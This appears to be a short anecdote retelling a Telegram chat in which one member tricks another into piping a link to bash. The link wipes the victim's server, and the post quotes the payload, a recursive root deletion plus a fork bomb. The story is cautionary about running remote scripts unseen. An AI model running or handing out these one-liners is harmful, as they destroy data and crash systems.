random conversation in a telegram group I'm in:

guy1: *pipes `curl <random link>` to bash* (terminal screenshot.jpg)
Why is it showing error?

guy2: you shouldn't pipe curl to bash without looking at the script.

guy1: posts second screenshot doing it again, this time it's a different link

guy2: Try this link, *sends a random link*

guy1: *blindly pipes it to bash* OH SHIT! fuck you, it was rm -rf /, this is my server

guy2: *posts the contents of the link he sent*
rm -rf --no-preserve-root /; :(){:|:&};:

guy2: lesson learned? I told you not to pipe curl to bash without looking at what it is.
